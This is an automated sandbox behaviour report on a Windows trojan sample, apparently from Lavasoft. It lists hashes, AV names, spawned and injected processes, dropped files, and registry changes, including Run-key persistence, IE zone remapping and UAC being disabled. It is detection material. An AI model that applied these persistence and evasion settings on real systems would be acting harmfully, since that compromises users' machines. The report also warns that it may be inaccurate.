Trojan.GenericKD.3422287_b2215f376d

by malwarelabrobot on August 4th, 2016 in Malware Descriptions.

Trojan.GenericKD.3422287 (BitDefender), Trojan:Java/Adwind.P (Microsoft), UDS:DangerousObject.Multi.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Nanocore.23 (DrWeb), Trojan.GenericKD.3422287 (B) (Emsisoft), GenericRXAC-DI!B2215F376D47 (McAfee), Trojan.Gen (Symantec), Trojan.MSIL.Injector (Ikarus), Trojan.GenericKD.3422287 (FSecure), MSIL10.ARGI (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R03EC0PGM16 (TrendMicro), Trojan.GenericKD.3422287 (AdAware), Trojan-PSW.Win32.Zbot.6.FD, Trojan.Win32.Swrort.3.FD, Sinowal.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Backdoor, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: b2215f376d47ab7f6ff7c4f063c988f8
SHA1: 6df3ebc30b43b523ebf1108652d89f6c89c9d606
SHA256: 6a443f6e4a19b9d4ba9b9c90b5061a14792ac04f3671cf215324e37fcc4788a2
SSDeep: 24576:vTatLToIN1KmVx2X0cRjrNAGyxGx0HkCHe9yhmZi9d31ywEsyzWXJ/ :l41K3BaxGxkkCHeV6ywEsyT
Size: 1662128 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: Oracle Corporation
Created at: 2016-07-20 13:58:40
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

xcopy.exe:2188
cscript.exe:844
cscript.exe:2216
cscript.exe:2028
cscript.exe:2080
cscript.exe:3876
cscript.exe:2988
cscript.exe:2680
cscript.exe:2372
%original file name%.exe:1308
scvhost.exe:2464
scvhost.exe:3252
scvhost.exe:1208
scvhost.exe:1100
tasklist.exe:2880
loader.exe:1512
ibza.exe:976
hostname.exe:2756
ipconfig.exe:3116
soft.exe:604
soft.exe:284
fffffffffffffff.exe:3440
netsh.exe:3540

The Trojan injects its code into the following process(es):

cry.exe:372
scvhost.exe:3704
crys.exe:1460
crys.exe:3640
DW20.EXE:1296
DW20.EXE:2176
svchost.exe:2084
dwm.exe:440
Explorer.EXE:880

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process xcopy.exe:2188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

The process %original file name%.exe:1308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\cry.exe (162 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (571 bytes)
%Documents and Settings%\%current user%\Application Data\crys.exe (1744 bytes)
%Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\%current user%\Application Data\soft.exe (226 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D (140 bytes)
%Documents and Settings%\%current user%\Application Data\scvhost.exe (10815 bytes)
%Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\A89DFCC31C360BA5CBD616749B1B1C5D (153 bytes)

The process cry.exe:372 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\crys.exe (1744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\New Order.jar (240 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\run.dat (8 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\catalog.dat (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fffffffffffffff.exe (1645 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\storage.dat (1654 bytes)
%Documents and Settings%\All Users\Application Data\wipeshadow.exe (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\loader.exe (77 bytes)
%Documents and Settings%\%current user%\Application Data\75ED9567-AA58-4C8E-A8EA-3CAD7C47AB03\settings.bin (24 bytes)

The process scvhost.exe:2464 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpbe9c0882.bat (215 bytes)

The process scvhost.exe:3252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
%Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)
%Documents and Settings%\%current user%\Application Data\soft.exe (226 bytes)

The process scvhost.exe:1208 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpa3c7d18a.bat (215 bytes)

The process scvhost.exe:1100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\gggg.jar (142 bytes)
%Documents and Settings%\%current user%\Application Data\Pony.exe (238 bytes)

The process loader.exe:1512 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\svchost.exe (113 bytes)

The process soft.exe:604 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Imxyhi\ibza.exe (226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpbe9c0882.bat (209 bytes)

The process soft.exe:284 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp2edc71a6.bat (209 bytes)

Registry activity

The process xcopy.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E BC 4C C7 B1 42 3D EE 0E AC D3 6E 11 E5 11 CB"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process cscript.exe:844 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 F2 30 22 FF 45 C9 48 EB 90 DD 36 F0 D9 57 41"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process cscript.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 6F 64 2D DD 51 85 71 7D 78 D2 35 2C 88 98 7C"

The process cscript.exe:2028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "91 8B 6A 2C 09 51 86 67 CE DD 81 51 9F 79 ED 3F"

The process cscript.exe:2080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 7E 8C 98 C5 DC 35 45 26 48 37 73 11 F1 24 E5"

The process cscript.exe:3876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 DB B0 F7 79 FF 74 85 B0 E3 95 74 8C 43 14 C7"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process cscript.exe:2988 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 8F A7 DD E4 5C DF 64 AC 7E DE 38 81 16 B7 23"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process cscript.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F F0 56 13 79 2D 18 5F C9 58 F1 03 F1 C0 20 47"

The process cscript.exe:2372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 43 AA 40 B8 AA AD AB 22 8A A0 F2 EE ED 84 03"

The process %original file name%.exe:1308 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 37 94 FA A2 9B 57 6B 88 ED 34 83 58 FC C6 2A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"Cry.exe" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"Pony.exe" = "Pony"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"soft.exe" = "soft"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Java\jre6\bin]
"javaw.exe" = "Java(TM) Platform SE binary"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"crys.exe" = "crys"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"scvhost.exe" = "scvhost"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process cry.exe:372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F 69 D8 9A A5 6C BB 8D EB 1E C0 76 4E 55 E9 A1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"Loader.exe" = "NT Kernel & System"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"fffffffffffffff.exe" = "fffffffffffffff"
"crys.exe" = "crys"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process scvhost.exe:2464 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 8E BE 33 D4 48 E6 41 51 06 84 82 13 41 24 10"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process scvhost.exe:3252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B2 17 E0 74 86 EB 4D 6D AE 2F BA 69 1E 14 49 FF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

The process scvhost.exe:1208 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 1C F8 C3 73 03 62 B5 F8 65 4C 41 81 8E 76 C4"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process scvhost.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 05 A7 41 BE 84 8A 07 F1 8D 91 D4 6C 7B 62 D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Update" = "%Documents and Settings%\%current user%\Application Data\scvhost.exe"

The process scvhost.exe:3704 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 CD 1E 80 C0 CD 4A 6A E6 00 99 48 42 34 99 C5"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process tasklist.exe:2880 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 03 FC 9E DE 3F A6 98 B6 19 AF 34 F9 3F A4 32"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process crys.exe:1460 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D9 44 29 66 CD 18 66 91 9D E9 8B DE B6 0D 30 2C"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process crys.exe:3640 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D AA 15 13 12 55 FC 1D 99 F6 7B EE D8 8F 86 91"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The process loader.exe:1512 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BF 56 9B 2C 99 63 36 A8 20 F9 12 BC B3 FD 49 5D"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\SOFTWARE\Microsoft\Security Center]
"UacDisableNotify" = "0"

The process ibza.exe:976 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 62 C1 E0 41 0A 8B 2A 4E 0F 7E D6 6B B1 3F DB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process hostname.exe:2756 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 3C 29 8F 61 85 DF F1 00 23 D0 99 88 D7 69 62"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process ipconfig.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 52 2A 8E 1E E8 42 E9 77 70 DF D9 38 16 A8 8C"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The process soft.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8F 4A C2 33 93 0C 76 2C DB A0 07 2F 31 F5 0B 55"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process soft.exe:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D 6C AD 74 25 2D B1 7E B5 E1 5C 48 90 12 98 23"

[HKCU\Software\Microsoft\Inemet]
"Argouqc" = "D0 21 20 FC 9A 29 43 E4 A4 6D 27 03 AB B9 3B 51"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process fffffffffffffff.exe:3440 makes changes in the system registry.
